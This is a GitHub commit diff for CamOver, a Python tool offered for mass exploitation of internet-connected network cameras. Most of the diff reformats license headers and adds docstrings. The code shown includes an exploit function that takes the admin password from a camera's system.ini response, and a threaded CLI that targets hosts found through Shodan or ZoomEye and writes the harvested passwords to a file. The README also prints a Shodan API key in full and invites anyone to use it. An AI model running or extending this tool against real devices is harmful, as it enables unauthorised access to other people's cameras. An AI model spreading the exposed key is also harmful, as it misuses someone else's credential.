STRLCPY/CamOver

Add files via upload
Ivan Nikolsky committed with GitHub 2 years ago

abcded13

1 parent 2afe39f7

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

README.md

		skipped 69 lines
70	70		camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
71	71		```
72	72
73		-	NOTE: Given Shodan API key (`PSKINdQe1GyxGgecYz2191H2JoS9qvgD`) is my PRO API key, you can use this key or your own, be free to use all our resources for free :)
	73	+	NOTE: Given Shodan API key (`PSKINdQe1GyxGgecYz2191H2JoS9qvgD`) is my PRO API key, you can use this key or your own,
	74	+	be free to use all our resources for free :)
74	75
75	76		Exploiting cameras from input file
76	77
		skipped 3 lines
80	81		camover -t -i cameras.txt -o passwords.txt
81	82		```
82	83
83		-	NOTE: It will exploit all cameras in `cameras.txt` list by their addresses and save all obtained passwords to `passwords.txt`.
	84	+	NOTE: It will exploit all cameras in `cameras.txt` list by their addresses and save all obtained passwords
	85	+	to `passwords.txt`.
84	86
85	87		## API usage
86	88
		skipped 25 lines

■ ■ ■ ■ ■ ■

camover/__init__.py

1		-	#!/usr/bin/env python3
	1	+	"""
	2	+	MIT License
2	3
3		-	#
4		-	# MIT License
5		-	#
6		-	# Copyright (c) 2020-2022 EntySec
7		-	#
8		-	# Permission is hereby granted, free of charge, to any person obtaining a copy
9		-	# of this software and associated documentation files (the "Software"), to deal
10		-	# in the Software without restriction, including without limitation the rights
11		-	# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
12		-	# copies of the Software, and to permit persons to whom the Software is
13		-	# furnished to do so, subject to the following conditions:
14		-	#
15		-	# The above copyright notice and this permission notice shall be included in all
16		-	# copies or substantial portions of the Software.
17		-	#
18		-	# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
19		-	# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
20		-	# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
21		-	# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
22		-	# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
23		-	# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
24		-	# SOFTWARE.
25		-	#
	4	+	Copyright (c) 2020-2022 EntySec
	5	+
	6	+	Permission is hereby granted, free of charge, to any person obtaining a copy
	7	+	of this software and associated documentation files (the "Software"), to deal
	8	+	in the Software without restriction, including without limitation the rights
	9	+	to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	10	+	copies of the Software, and to permit persons to whom the Software is
	11	+	furnished to do so, subject to the following conditions:
	12	+
	13	+	The above copyright notice and this permission notice shall be included in all
	14	+	copies or substantial portions of the Software.
	15	+
	16	+	THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
	17	+	IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
	18	+	FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
	19	+	AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
	20	+	LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
	21	+	OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
	22	+	SOFTWARE.
	23	+	"""
26	24
27	25		from .__main__ import CamOver
28	26

■ ■ ■ ■ ■ ■

camover/__main__.py

1		-	#!/usr/bin/env python3
	1	+	"""
	2	+	MIT License
2	3
3		-	#
4		-	# MIT License
5		-	#
6		-	# Copyright (c) 2020-2022 EntySec
7		-	#
8		-	# Permission is hereby granted, free of charge, to any person obtaining a copy
9		-	# of this software and associated documentation files (the "Software"), to deal
10		-	# in the Software without restriction, including without limitation the rights
11		-	# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
12		-	# copies of the Software, and to permit persons to whom the Software is
13		-	# furnished to do so, subject to the following conditions:
14		-	#
15		-	# The above copyright notice and this permission notice shall be included in all
16		-	# copies or substantial portions of the Software.
17		-	#
18		-	# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
19		-	# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
20		-	# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
21		-	# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
22		-	# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
23		-	# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
24		-	# SOFTWARE.
25		-	#
	4	+	Copyright (c) 2020-2022 EntySec
	5	+
	6	+	Permission is hereby granted, free of charge, to any person obtaining a copy
	7	+	of this software and associated documentation files (the "Software"), to deal
	8	+	in the Software without restriction, including without limitation the rights
	9	+	to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	10	+	copies of the Software, and to permit persons to whom the Software is
	11	+	furnished to do so, subject to the following conditions:
	12	+
	13	+	The above copyright notice and this permission notice shall be included in all
	14	+	copies or substantial portions of the Software.
	15	+
	16	+	THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
	17	+	IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
	18	+	FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
	19	+	AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
	20	+	LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
	21	+	OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
	22	+	SOFTWARE.
	23	+	"""
26	24
27	25		import re
28	26		import requests
29	27
30	28
31	29		class CamOver:
	30	+	""" Main class of camover module.
	31	+
	32	+	This main class of camover module is intended for providing
	33	+	an exploit for network camera vulnerability that extracts credentials
	34	+	from the obtained system.ini file.
	35	+	"""
	36	+
32	37		@staticmethod
33		-	def exploit(address):
	38	+	def exploit(address: str) -> tuple:
	39	+	""" Exploit the vulnerability in network camera and extract credentials
	40	+
	41	+	:param str address: device address
	42	+	:return tuple: tuple of username and password
	43	+	"""
	44	+
34	45		username = 'admin'
35	46
36	47		try:
		skipped 3 lines
40	51		timeout=3
41	52		)
42	53		except Exception:
43		-	return None
	54	+	return None, None
44	55
45	56		if response.status_code == 200:
46	57		strings = re.findall("[^\x00-\x1F\x7F-\xFF]{4,}", response.text)
		skipped 7 lines

■ ■ ■ ■ ■ ■

camover/badges.py

1		-	#!/usr/bin/env python3
	1	+	"""
	2	+	MIT License
	3	+
	4	+	Copyright (c) 2020-2022 EntySec
	5	+
	6	+	Permission is hereby granted, free of charge, to any person obtaining a copy
	7	+	of this software and associated documentation files (the "Software"), to deal
	8	+	in the Software without restriction, including without limitation the rights
	9	+	to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	10	+	copies of the Software, and to permit persons to whom the Software is
	11	+	furnished to do so, subject to the following conditions:
	12	+
	13	+	The above copyright notice and this permission notice shall be included in all
	14	+	copies or substantial portions of the Software.
2	15
3		-	#
4		-	# MIT License
5		-	#
6		-	# Copyright (c) 2020-2022 EntySec
7		-	#
8		-	# Permission is hereby granted, free of charge, to any person obtaining a copy
9		-	# of this software and associated documentation files (the "Software"), to deal
10		-	# in the Software without restriction, including without limitation the rights
11		-	# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
12		-	# copies of the Software, and to permit persons to whom the Software is
13		-	# furnished to do so, subject to the following conditions:
14		-	#
15		-	# The above copyright notice and this permission notice shall be included in all
16		-	# copies or substantial portions of the Software.
17		-	#
18		-	# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
19		-	# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
20		-	# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
21		-	# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
22		-	# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
23		-	# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
24		-	# SOFTWARE.
25		-	#
	16	+	THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
	17	+	IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
	18	+	FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
	19	+	AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
	20	+	LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
	21	+	OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
	22	+	SOFTWARE.
	23	+	"""
26	24
27	25
28	26		class Badges:
	27	+	""" Subclass of camover module.
	28	+
	29	+	This subclass of camover module is intended for providing
	30	+	some message printing methods.
	31	+	"""
	32	+
29	33		@staticmethod
30		-	def print_empty(message="", end='\n'):
	34	+	def print_empty(message: str = "", end: str = '\n') -> None:
	35	+	""" Print string with empty start.
	36	+
	37	+	:param str message: message to print
	38	+	:param str end: string to print after the message
	39	+	:return None: None
	40	+	"""
	41	+
31	42		print(f"\033[1K\r{message}", end=end)
32	43
33	44		@staticmethod
34		-	def print_process(message, end='\n'):
	45	+	def print_process(message: str, end: str = '\n') -> None:
	46	+	""" Print string with [*] start.
	47	+
	48	+	:param str message: message to print
	49	+	:param str end: string to print after the message
	50	+	:return None: None
	51	+	"""
	52	+
35	53		print(f"\033[1K\r\033[1;34m[*]\033[0m {message}", end=end)
36	54
37	55		@staticmethod
38		-	def print_success(message, end='\n'):
	56	+	def print_success(message: str, end: str = '\n') -> None:
	57	+	""" Print string with [+] start.
	58	+
	59	+	:param str message: message to print
	60	+	:param str end: string to print after the message
	61	+	:return None: None
	62	+	"""
	63	+
39	64		print(f"\033[1K\r\033[1;32m[+]\033[0m {message}", end=end)
40	65
41	66		@staticmethod
42		-	def print_error(message, end='\n'):
	67	+	def print_error(message: str, end: str = '\n') -> None:
	68	+	""" Print string with [-] start.
	69	+
	70	+	:param str message: message to print
	71	+	:param str end: string to print after the message
	72	+	:return None: None
	73	+	"""
	74	+
43	75		print(f"\033[1K\r\033[1;31m[-]\033[0m {message}", end=end)
44	76
45	77		@staticmethod
46		-	def print_warning(message, end='\n'):
	78	+	def print_warning(message: str, end: str = '\n') -> None:
	79	+	""" Print string with [!] start.
	80	+
	81	+	:param str message: message to print
	82	+	:param str end: string to print after the message
	83	+	:return None: None
	84	+	"""
	85	+
47	86		print(f"\033[1K\r\033[1;33m[!]\033[0m {message}", end=end)
48	87
49	88		@staticmethod
50		-	def print_information(message, end='\n'):
	89	+	def print_information(message: str, end: str = '\n') -> None:
	90	+	""" Print string with [i] start.
	91	+
	92	+	:param str message: message to print
	93	+	:param str end: string to print after the message
	94	+	:return None: None
	95	+	"""
	96	+
51	97		print(f"\033[1K\r\033[1;77m[i]\033[0m {message}", end=end)
52	98

■ ■ ■ ■ ■ ■

camover/cli.py

1		-	#!/usr/bin/env python3
	1	+	"""
	2	+	MIT License
2	3
3		-	#
4		-	# MIT License
5		-	#
6		-	# Copyright (c) 2020-2022 EntySec
7		-	#
8		-	# Permission is hereby granted, free of charge, to any person obtaining a copy
9		-	# of this software and associated documentation files (the "Software"), to deal
10		-	# in the Software without restriction, including without limitation the rights
11		-	# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
12		-	# copies of the Software, and to permit persons to whom the Software is
13		-	# furnished to do so, subject to the following conditions:
14		-	#
15		-	# The above copyright notice and this permission notice shall be included in all
16		-	# copies or substantial portions of the Software.
17		-	#
18		-	# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
19		-	# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
20		-	# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
21		-	# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
22		-	# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
23		-	# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
24		-	# SOFTWARE.
25		-	#
	4	+	Copyright (c) 2020-2022 EntySec
26	5
27		-	import os
	6	+	Permission is hereby granted, free of charge, to any person obtaining a copy
	7	+	of this software and associated documentation files (the "Software"), to deal
	8	+	in the Software without restriction, including without limitation the rights
	9	+	to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	10	+	copies of the Software, and to permit persons to whom the Software is
	11	+	furnished to do so, subject to the following conditions:
	12	+
	13	+	The above copyright notice and this permission notice shall be included in all
	14	+	copies or substantial portions of the Software.
	15	+
	16	+	THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
	17	+	IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
	18	+	FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
	19	+	AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
	20	+	LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
	21	+	OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
	22	+	SOFTWARE.
	23	+	"""
	24	+
28	25		import argparse
29		-	import threading
	26	+	import os
30	27		import requests
31		-
	28	+	import threading
32	29		from shodan import Shodan
33	30		from time import sleep as thread_delay
34	31
		skipped 2 lines
37	34
38	35
39	36		class CamOverCLI(CamOver, Badges):
	37	+	""" Subclass of camover module.
	38	+
	39	+	This subclass of camover module is intended for providing
	40	+	command-line interface for CamOver.
	41	+	"""
	42	+
40	43		thread_delay = 0.1
41	44
42		-	description = "CamOver is a camera exploitation tool that allows to disclosure network camera admin password."
	45	+	description = (
	46	+	'CamOver is a camera exploitation tool that allows to'
	47	+	' disclosure network camera admin password.'
	48	+	)
	49	+
43	50		parser = argparse.ArgumentParser(description=description)
44	51		parser.add_argument('-t', '--threads', dest='threads', action='store_true', help='Use threads for fastest work.')
45	52		parser.add_argument('-o', '--output', dest='output', help='Output result to file.')
		skipped 4 lines
50	57		parser.add_argument('-p', '--pages', dest='pages', type=int, help='Number of pages you want to get from ZoomEye.')
51	58		args = parser.parse_args()
52	59
53		-	def thread(self, address):
	60	+	def thread(self, address: str) -> bool:
	61	+	""" Start new thread for the specified address.
	62	+
	63	+	:param str address: device address
	64	+	:return bool: True if thread succeed
	65	+	"""
	66	+
54	67		result = self.exploit(address)
55	68
56	69		if result:
		skipped 6 lines
63	76		return True
64	77		return False
65	78
66		-	def crack(self, addresses):
67		-	line = "/-\\|"
	79	+	def crack(self, addresses: list) -> None:
	80	+	""" Crack all devices from the specified list.
	81	+
	82	+	:param list addresses: list of devices addresses
	83	+	:return None: None
	84	+	"""
	85	+
	86	+	line = "/-\\\|"
68	87
69	88		counter = 0
70	89		threads = list()
		skipped 22 lines
93	112		thread.join()
94	113		counter += 1
95	114
96		-	def start(self):
	115	+	def start(self) -> None:
	116	+	""" Main command-line arguments handler.
	117	+
	118	+	:return None: None
	119	+	"""
	120	+
97	121		if self.args.output:
98	122		directory = os.path.split(self.args.output)[0]
99	123
		skipped 64 lines
164	188		return
165	189		self.print_empty(end='')
166	190
167		-	def main():
	191	+
	192	+	def main() -> None:
	193	+	""" CamOver command-line interface.
	194	+
	195	+	:return None: None
	196	+	"""
	197	+
168	198		try:
169	199		cli = CamOverCLI()
170	200		cli.start()
		skipped 3 lines

■ ■ ■ ■ ■ ■

setup.py

1		-	#!/usr/bin/env python3
	1	+	"""
	2	+	MIT License
2	3
3		-	#
4		-	# MIT License
5		-	#
6		-	# Copyright (c) 2020-2022 EntySec
7		-	#
8		-	# Permission is hereby granted, free of charge, to any person obtaining a copy
9		-	# of this software and associated documentation files (the "Software"), to deal
10		-	# in the Software without restriction, including without limitation the rights
11		-	# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
12		-	# copies of the Software, and to permit persons to whom the Software is
13		-	# furnished to do so, subject to the following conditions:
14		-	#
15		-	# The above copyright notice and this permission notice shall be included in all
16		-	# copies or substantial portions of the Software.
17		-	#
18		-	# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
19		-	# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
20		-	# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
21		-	# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
22		-	# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
23		-	# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
24		-	# SOFTWARE.
25		-	#
	4	+	Copyright (c) 2020-2022 EntySec
	5	+
	6	+	Permission is hereby granted, free of charge, to any person obtaining a copy
	7	+	of this software and associated documentation files (the "Software"), to deal
	8	+	in the Software without restriction, including without limitation the rights
	9	+	to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	10	+	copies of the Software, and to permit persons to whom the Software is
	11	+	furnished to do so, subject to the following conditions:
	12	+
	13	+	The above copyright notice and this permission notice shall be included in all
	14	+	copies or substantial portions of the Software.
	15	+
	16	+	THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
	17	+	IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
	18	+	FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
	19	+	AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
	20	+	LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
	21	+	OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
	22	+	SOFTWARE.
	23	+	"""
26	24
27	25		from setuptools import setup, find_packages
28	26
29	27		setup(name='camover',
30	28		version='1.0.0',
31		-	description='CamOver is a camera exploitation tool that allows to disclosure network camera admin password.',
	29	+	description=(
	30	+	'CamOver is a camera exploitation tool that allows to'
	31	+	' disclosure network camera admin password.'
	32	+	),
32	33		url='https://github.com/EntySec/CamOver',
33	34		author='EntySec',
34	35		author_email='[email protected]',
		skipped 2 lines
37	38		packages=find_packages(),
38	39		entry_points={
39	40		"console_scripts": [
40		-	"camover = camover.cli:main"
	41	+	"camover = camover.cli:main"
41	42		]
42	43		},
43	44		install_requires=[
44	45		'shodan',
45	46		],
46	47		zip_safe=False
47		-	)
	48	+	)
48	49

Add files via upload